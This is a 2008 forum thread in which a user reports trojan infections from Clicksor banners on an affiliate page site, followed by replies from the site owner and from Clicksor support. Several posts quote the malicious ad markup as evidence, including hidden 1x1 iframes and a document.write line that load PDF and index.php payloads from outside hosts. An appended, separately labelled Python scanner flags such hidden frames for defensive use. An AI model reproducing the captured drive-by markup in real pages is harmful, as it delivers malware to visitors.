Full Version: Virus in a Clicksor Banner
wagdoll
Several months ago Raremails had clicksor banners on the aff pages. The clicksor banners had viruses inside them associated with a domain called especialads. I informed Anyyan of these viruses, he said he'd remove Clicksor when he reached payout, and he did. Then he put it back, and it still had the viruses. This time he got upset instead of removing it. Quietly, though, he did subsequently remove the banners after getting upset over his site being paused.

Then a few weeks ago, Anyyan put the Clicksor banners back on raremails. I soon established the especialads virus was still in there, so I wrote him a note to let him know. He did not reply and left the clicksor on there.

Tonight I hit a raremails aff page in a PTP page, my computer went all slow and the hard drive churned. I got suspicious/worried. Then my AVG popped up saying there was Virus Pakes on my computer.

It came from the Clicksor banner on the raremails aff page...
CODE
<script type="text/javascript">
</script>
<script src="http://ads.clicksor.com/showAd.php?pid=3406&adtype=2&sid=10063&zone=" type="text/javascript">
</script>
<div id="clka87_82" align="center" style="width: 468px; height: 60px;">
<div>
<iframe width="468" scrolling="no" height="60" frameborder="0" marginheight="0" marginwidth="0" src="http://ads.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=2&sid=10063&pid=3406&uid=24650523159418&adu=1&image=2&c1=%2399CC33&c2=%23FFFFFF&c3=%23000000&c4=%23666666&memkey=d42e6d65c69cbf7d534a84e119f0dd67&bdurl=http%3A%2F%2Fwww.fusionmails.com%2Fscripts%2Frunner.php%3FGA%3Dmain&ref=http%3A%2F%2Fwww.raremails.com%2Fscripts%2Frunner.php%3FGA%3Daffiliate&qp=%60%5E%25%284%FB%24%27%24%F9%22%2F%FD%21%2F%7E&url=http%3A%2F%2Fads.clicksor.com%2Fserving%2Fshowit.php%3Fzone%3D%26chad%3D1%26cs%3D%26adtype%3D2%26sid%3D10063%26pid%3D3406%26uid%3D24650523159418%26adu%3D1%26image%3D2%26c1%3D%252399CC33%26c2%3D%2523FFFFFF%26c3%3D%2523000000%26c4%3D%2523666666%26memkey%3Dd42e6d65c69cbf7d534a84e119f0dd67%26bdurl%3Dhttp%253A%252F%252Fwww.fusionmails.com%252Fscripts%252Frunner.php%253FGA%253Dmain%26ref%3Dhttp%253A%252F%252Fwww.raremails.com%252Fscripts%252Frunner.php%253FGA%253Daffiliate%26qp%3D%2560%255E%2525%25284%25FB%2524%2527%2524%25F9%2522%252F%25FD%2521%252F%257E%26in_id%3D&width=468&height=60&pid=3406&sid=10063&nid=1&zone=">
<html>
<head>
</head>
<body marginwidth="0" marginheight="0" bgcolor="#ffffff" topmargin="0" leftmargin="0">
<script language="JavaScript">
</script>
<object id="FLASH_AD" width="468" height="60" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
</object>
<script src="http://hostzone2.h.advra.net/1384889/flashwrite_1_2.js" style="outline-color: invert; outline-style: none; outline-width: medium;">
</script>
<script src="http://hostzone2.h.advra.net/1384889/adobef" type="text/javascript" language="javascript">
</script>
<iframe width="1" height="1" src="http://78.109.18.210/1r.pdf" style="visibility: hidden ! important;">
</iframe>
<noscript><A TARGET="_blank" HREF="http://www.productsandservices.bt.com/consumerProducts/displayTopic.do?topicId=23734&s_cid=con_display_zedmedia_callsandlines_vidZ01_Q1&vendorid=S33"><IMG SRC="http://hostzone2.h.advra.net/1384889/BTC_Standard_Q2_Voice_Receipt_Retention_468x60.gif" alt="" BORDER=0></A></noscript>
</body>


Another thing is that only one PO who I sent an abuse report to who had the Rare aff page in their PTP with the virus actually responded. It is impossible that I am the only one getting these banners with the viruses targeted solely to me as Anyyan seemed to try to imply. You don't get a choice about visiting Raremails aff pages like you do PTP pages, they are inside the PTP rotators so you could get them any time unexpectedly and as long as this Clicksor is on there and Clicksor do nothing to remove this channel for the virus spreaders all PTR members computers are at risk.

NB I did write to Clicksor as well as Raremails and got no reply from Clicksor either. There is also confirmation of the especialads viruses in malware forums stating and showing how it comes through Clicksor.
anyyan
The one i didn't reply you was dated on Jul.17th and my baby born on 18th, i then had 7-10 off-work days and up until now my time's still limited.

Why big companies like Clicksor would let the "virus" run over months and months, if there's any? The banner is 468x60 and most popularly published.

Sorry, and yes, during the several months you're still the only one that "caught" it, as far as i know.

Actually, i don't publish Clicksor on Raremails, i have it on a personal page of mine. Exactly last night, i just sent an admin message that a lot of improvements were scheduled in August on Raremails, including completely redoing the affiliate page.

No more troubles soon. Raremails will be one of the most popular affiliate page sites, again.

Thanks.
wagdoll
QUOTE
The one i didn't reply you was dated on Jul.17th and my baby born on 18th, i then had 7-10 off-work days and up until now my time's still limited.


Congrats on your baby

Problem is you already knew Clicksor had a long term virus problem and you could have either not put it back or you could have tried to find out if the virus was still there rather than putting it up at a time when you weren't even able to check your emails for two weeks?

QUOTE
Why big companies like Clicksor would let the "virus" run over months and months, if there's any? The banner is 468x60 and most popularly published.


I don't understand why a big company like Clicksor would let a problem like this go on for so long, but they have been and are. There is not a question of IF there is a virus, I gave you a link before and in the email I sent to you to a good anti-malware forum where a professional malware hunter had documented one of these viruses coming through Clicksor. This is not just 'my' word, I have shown you the codes to prove it's there, I have shown you links to professionals saying it's there and with better proofs than I have.

QUOTE
Sorry, and yes, during the several months you're still the only one that "caught" it, as far as i know.


And you're so welcome that I not only put my computer at risk over and over viewing your site, but I also spent the time to delve into the codes, research the issue and let you know about this about four times? How do you know I am the only one who has caught it? Who else would know where the virus came from if they caught it too? Others are catching it from the Clicksor banners, there's a thread here where Longshanks got an AV notification of the especialads virus from a site running vastgate and clicksor is on one of the sites in vastgate. You can search the internet and see others getting this virus from the Clicksor banner. Your rare page is usually inside another PTP rotator, how many people who had been hit would let you know it might have been from your site? They're normally too busy trying to get rid of the virus or they 'might' hit the abuse report button on the main PTP site, but they don't normally write to the site inside the rotator. Then you have lots of PTR members using noscript today precisely because of sites like yours with viruses and extra webpages making them slow loading.

Michigander had an mvent warning a couple of weeks ago from a raremails page and you intimidated her into closing the thread. Was it this virus that set off the mvent, was it the other virus that the lady at the malware forum told me was in another banner? Some iframe less than 5 x 5 set off michigander's mvent and you were too busy saying how clean your site was to even investigate where it actually was. Just because the zero iframe code didn't show up for michigander doesn't mean it wasn't there.

QUOTE
Actually, i don't publish Clicksor on Raremails, i have it on a personal page of mine. Exactly last night, i just sent an admin message that a lot of improvements were scheduled in August on Raremails, including completely redoing the affiliate page.


Does it really make a difference if it is directly on raremails or on the page that is 'always' in the rotator? It's the raremails page that goes in the PTP rotators, that page that you have the clicksor on is more or less always the page in the rare iframe, it's a part of the page like your arm or leg is a part of you. It is the raremails page that people will understand that the virus is on regardless of which domain you technically have the banner on 'directly'.

QUOTE
No more troubles soon. Raremails will be one of the most popular affiliate page sites, again.


It is very popular and that's the problem, because you don't seem to care about these viruses. Even in this post you haven't shown any contrition, you're just intimating that I am wrong or lying or that it's insignificant compared to how great your site is, and bad bad me for writing to you about the virus at a time that was inconvenient for you.

And you haven't even intimated that you might remove the Clicksor again...

anyyan
Thanks for your congrats.

Please invoice your opinions along with other professionals' to Clicksor support if possible, i assume their technical team would be able to help.

I didn't intimate any part is bad, you, me or Clicksor. You tell the experience of your end, i also do from my end, Clicksor do theirs.

Time will tell.
wagdoll
QUOTE (anyyan @ Aug 7 2008, 10:13 PM) *
Thanks for your congrats.

Please invoice your opinions along with other professionals' to Clicksor support if possible, i assume their technical team would be able to help.

I didn't intimate any part is bad, you, me or Clicksor. You tell the experience of your end, i also do from my end, Clicksor do theirs.

Time will tell.


As I said, I have tried writing to Clicksor before, I assumed someone there might help, I was wrong. You might have more luck as a publisher if you take all the links and information I've given you and the information in the bluetack forums which is much better than mine, though they also need the information on this new virus which is different to the especialads problem.
Clicksor_CS
QUOTE (wagdoll @ Aug 7 2008, 09:22 PM) *
Several months ago Raremails had clicksor banners on the aff pages. The clicksor banners had viruses inside them associated with a domain called especialads. I informed Anyyan of these viruses, he said he'd remove Clicksor when he reached payout, and he did. Then he put it back, and it still had the viruses. This time he got upset instead of removing it. Quietly, though, he did subsequently remove the banners after getting upset over his site being paused.

Then a few weeks ago, Anyyan put the Clicksor banners back on raremails. I soon established the especialads virus was still in there, so I wrote him a note to let him know. He did not reply and left the clicksor on there.

Tonight I hit a raremails aff page in a PTP page, my computer went all slow and the hard drive churned. I got suspicious/worried. Then my AVG popped up saying there was Virus Pakes on my computer.

It came from the Clicksor banner on the raremails aff page...
CODE
<script type="text/javascript">
</script>
<script src="http://ads.clicksor.com/showAd.php?pid=3406&adtype=2&sid=10063&zone=" type="text/javascript">
</script>
<div id="clka87_82" align="center" style="width: 468px; height: 60px;">
<div>
<iframe width="468" scrolling="no" height="60" frameborder="0" marginheight="0" marginwidth="0" src="http://ads.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=2&sid=10063&pid=3406&uid=24650523159418&adu=1&image=2&c1=%2399CC33&c2=%23FFFFFF&c3=%23000000&c4=%23666666&memkey=d42e6d65c69cbf7d534a84e119f0dd67&bdurl=http%3A%2F%2Fwww.fusionmails.com%2Fscripts%2Frunner.php%3FGA%3Dmain&ref=http%3A%2F%2Fwww.raremails.com%2Fscripts%2Frunner.php%3FGA%3Daffiliate&qp=%60%5E%25%284%FB%24%27%24%F9%22%2F%FD%21%2F%7E&url=http%3A%2F%2Fads.clicksor.com%2Fserving%2Fshowit.php%3Fzone%3D%26chad%3D1%26cs%3D%26adtype%3D2%26sid%3D10063%26pid%3D3406%26uid%3D24650523159418%26adu%3D1%26image%3D2%26c1%3D%252399CC33%26c2%3D%2523FFFFFF%26c3%3D%2523000000%26c4%3D%2523666666%26memkey%3Dd42e6d65c69cbf7d534a84e119f0dd67%26bdurl%3Dhttp%253A%252F%252Fwww.fusionmails.com%252Fscripts%252Frunner.php%253FGA%253Dmain%26ref%3Dhttp%253A%252F%252Fwww.raremails.com%252Fscripts%252Frunner.php%253FGA%253Daffiliate%26qp%3D%2560%255E%2525%25284%25FB%2524%2527%2524%25F9%2522%252F%25FD%2521%252F%257E%26in_id%3D&width=468&height=60&pid=3406&sid=10063&nid=1&zone=">
<html>
<head>
</head>
<body marginwidth="0" marginheight="0" bgcolor="#ffffff" topmargin="0" leftmargin="0">
<script language="JavaScript">
</script>
<object id="FLASH_AD" width="468" height="60" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
</object>
<script src="http://hostzone2.h.advra.net/1384889/flashwrite_1_2.js" style="outline-color: invert; outline-style: none; outline-width: medium;">
</script>
<script src="http://hostzone2.h.advra.net/1384889/adobef" type="text/javascript" language="javascript">
</script>
<iframe width="1" height="1" src="http://78.109.18.210/1r.pdf" style="visibility: hidden ! important;">
</iframe>
<noscript><A TARGET="_blank" HREF="http://www.productsandservices.bt.com/consumerProducts/displayTopic.do?topicId=23734&s_cid=con_display_zedmedia_callsandlines_vidZ01_Q1&vendorid=S33"><IMG SRC="http://hostzone2.h.advra.net/1384889/BTC_Standard_Q2_Voice_Receipt_Retention_468x60.gif" alt="" BORDER=0></A></noscript>
</body>


Another thing is that only one PO who I sent an abuse report to who had the Rare aff page in their PTP with the virus actually responded. It is impossible that I am the only one getting these banners with the viruses targeted solely to me as Anyyan seemed to try to imply. You don't get a choice about visiting Raremails aff pages like you do PTP pages, they are inside the PTP rotators so you could get them any time unexpectedly and as long as this Clicksor is on there and Clicksor do nothing to remove this channel for the virus spreaders all PTR members computers are at risk.

NB I did write to Clicksor as well as Raremails and got no reply from Clicksor either. There is also confirmation of the especialads viruses in malware forums stating and showing how it comes through Clicksor.


Hi,

I am sincerely sorry about the inconvenience caused by this issue. In order for us to directly locate the ad campaign please PM me the IPs with which the ad was viewed with, Ad URL, Time of occurrence, and the Anti-Virus Program.

Your information is helpful for us.

Thank you for your cooperation!
Clicksor_CS
QUOTE (anyyan @ Aug 7 2008, 10:20 PM) *
The one i didn't reply you was dated on Jul.17th and my baby born on 18th, i then had 7-10 off-work days and up until now my time's still limited.

Why big companies like Clicksor would let the "virus" run over months and months, if there's any? The banner is 468x60 and most popularly published.

Sorry, and yes, during the several months you're still the only one that "caught" it, as far as i know.

Actually, i don't publish Clicksor on Raremails, i have it on a personal page of mine. Exactly last night, i just sent an admin message that a lot of improvements were scheduled in August on Raremails, including completely redoing the affiliate page.

No more troubles soon. Raremails will be one of the most popular affiliate page sites, again.

Thanks.


Hi,

Please feel free to PM me if you see any suspicious ad on your site.

Thank you!
wagdoll
As requested I have sent PMs to Clicksor_CS with a lot of details of both viruses that were running in their banners. I was asked for an email address to be contacted at when the issues have been sorted out by their team. As yet no email has been received and at least one of these viruses is still being very busy.

Last week when my FF was upgraded to FF3 my adblock stopped working and I was getting this virus daily. It was very unpleasant, I had to keep running AV scan after scan and for days was too scared to do my online shopping or pay bills because there were still parts of this virus stuck on my computer.

This is the current problem running from the domain hostzone2.h.advra.net (the same one in the code of the first post of this thread!) Instead of getting removed, they're just updating the viruses in that while Clicksor continue to run the infected "ads".

That loads flash and scripts - this is the part I believe to be carrying the actual virus
CODE
document.write("<iframe src='http://trackitnow.org/pdfdoc/index.php?id=468' width=1 height=1></iframe>");


I grabbed that from the JS of the flash banner from firebug as the other codes are blocked now I have a working adblockplus which is now preventing the virus alert as it should.

This is the URL for that JS coding where that iframe code can be seen
CODE
<script src="http://hostzone2.h.advra.net/1384889/flashwrite_1_2.js">


I believe anyone with enough technical expertise will be able to confirm everything said here with this information.

The main thing is this is still a problem that has not yet been fully addressed by Clicksor. Plus each time I got that virus it was dropping a file a.exe into the system32 folder, but the name of the virus caught changed almost every time AVG caught it!

These are some of the results that turned up in AVG, I believe all of them were this same source, from the 23rd July onwards.
Virus Packes
Trojan Horse SHeur.CEWA
Trojan Horse SHeur.CNFP
Trojan Horse Dropper.Bravix.A
Possibly also Trojan Horse Downloader.Tiny.H
Possibly also Trojan Horse Generic10.ACRY

I've already sent Clicksor what I think is enough codes to show where the banner is on their site and that it is infected with trojans. I will save the full JS of that script file on my PC as I don't think it's of use to anyone but just to keep it for reference in case anyone does want it.
wagdoll
Just to make it clear, I do not have a problem with Anyyan or his sites (Fusionmails and Raremails) My only issue is with wanting the viruses removed. I was not the only one getting them on the internet, but apparently I am the only one in PTR getting them and I apologise profusely to Anyyan for any inconvenience caused by this situation. I am not in any way saying Anyyan runs bad sites, I have simply been very frustrated with these viruses and have posted as much information as I could to show what I was seeing and to show they were viruses and where they were. This does not imply that anyone else is going to get these viruses, my sincere wish is that no one else is affected.


title edited per request - sophie
wagdoll
Fresh infection today from a new domain but same Trojan. This time AVG has not picked it up. VirusTotal has 7 of 36 AVs recognising the file a.exe as malicious... so anyone who may have been exposed to this is recommended to do some scanning just in case.

http://www.virustotal.com/analisis/da464a8...b32ee3e5d186ab1

details
CODE
<script src="http://banners.yourroz.net/easyjet_D/flashwrite_1_2.js" style="display: none;">
</script>
<iframe height="1" width="1" src="http://up2tracker.net/pdfdoc/index.php?id=728" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium; display: none;">
</iframe>
<noscript><A TARGET="_blank" HREF="http://www.easyjet.com/en/book/index.asp?ref=ff5"><IMG SRC="http://banners.yourroz.net/easyjet_D/728x90_summer2winter_july_2008.gif" alt="" BORDER=0></A></noscript>
</body>


CODE
<script src="http://ads.clicksor.com/showAd.php?pid=3406&adtype=1&sid=10063&zone=" type="text/javascript">
</script>
<div id="clka42_46" align="center" style="width: 728px; height: 90px;">


You get a short browser freeze when you hit the file, but if your antivirus doesn't alert you, you wouldn't otherwise immediately know you've been infected
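
Added example, not part of any post in this thread: a static check a site owner could run over a saved copy of a page that embeds third-party ads, flagging the pattern shown in the CODE blocks above (an iframe no larger than 5 x 5, hidden with CSS, or written out by `document.write`). The function and class names, the `trusted_hosts` allow-list and the sample markup with its `.example` hosts are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_DIM = 5  # px; the thread mentions a warning triggered by an iframe under 5 x 5
WRITE_RE = re.compile(r"document\.write\(\s*([\"'])(.*?)\1\s*\)", re.S)

def _px(value):
    """'1' or '1px' -> 1; None for missing, percentage or unparseable sizes."""
    m = re.fullmatch(r"\s*(\d+)(?:px)?\s*", value or "")
    return int(m.group(1)) if m else None

def _css(style):
    """Inline style -> {property: value}, lower-cased, '!important' dropped."""
    out = {}
    for decl in (style or "").split(";"):
        if ":" in decl:
            prop, val = decl.split(":", 1)
            out[prop.strip().lower()] = re.sub(r"!\s*important", "", val).strip().lower()
    return out

class HiddenFrameFinder(HTMLParser):
    def __init__(self, trusted_hosts, via="markup"):
        super().__init__()
        self.trusted, self.via = set(trusted_hosts), via
        self.findings, self._script = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []  # buffer inline script text until </script>
        elif tag == "iframe":
            a = dict(attrs)
            css = _css(a.get("style"))
            w = _px(a.get("width") or css.get("width"))
            h = _px(a.get("height") or css.get("height"))
            reasons = []
            if w is not None and h is not None and max(w, h) <= MAX_DIM:
                reasons.append("tiny")
            if css.get("display") == "none" or css.get("visibility") == "hidden":
                reasons.append("css-hidden")
            host = urlparse(a.get("src") or "").hostname
            if reasons:
                if host not in self.trusted:
                    reasons.append("third-party")
                self.findings.append((host, self.via, reasons))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            # Re-parse any markup a script writes into the page with document.write
            for m in WRITE_RE.finditer("".join(self._script)):
                inner = HiddenFrameFinder(self.trusted, via="document.write")
                inner.feed(m.group(2)); inner.close()
                self.findings += inner.findings
            self._script = None

def scan(html, trusted_hosts=()):
    finder = HiddenFrameFinder(trusted_hosts)
    finder.feed(html); finder.close()
    return finder.findings

# Constructed sample modelled on the thread's snippets; hosts are placeholders.
SAMPLE = """<iframe width="468" height="60" src="http://ads.adnetwork.example/serve"></iframe>
<iframe width="1" height="1" src="http://203.0.113.7/doc.pdf" style="visibility: hidden ! important;"></iframe>
<iframe height="1" width="1" src="http://tracker.example/index.php?id=728" style="display: none;"></iframe>
<script>document.write("<iframe src='http://dropper.example/index.php?id=468' width=1 height=1></iframe>");</script>"""
```

A check like this reads only literal markup and plain `document.write` strings, so frames inserted by obfuscated or remotely loaded script need a rendered-DOM inspection instead.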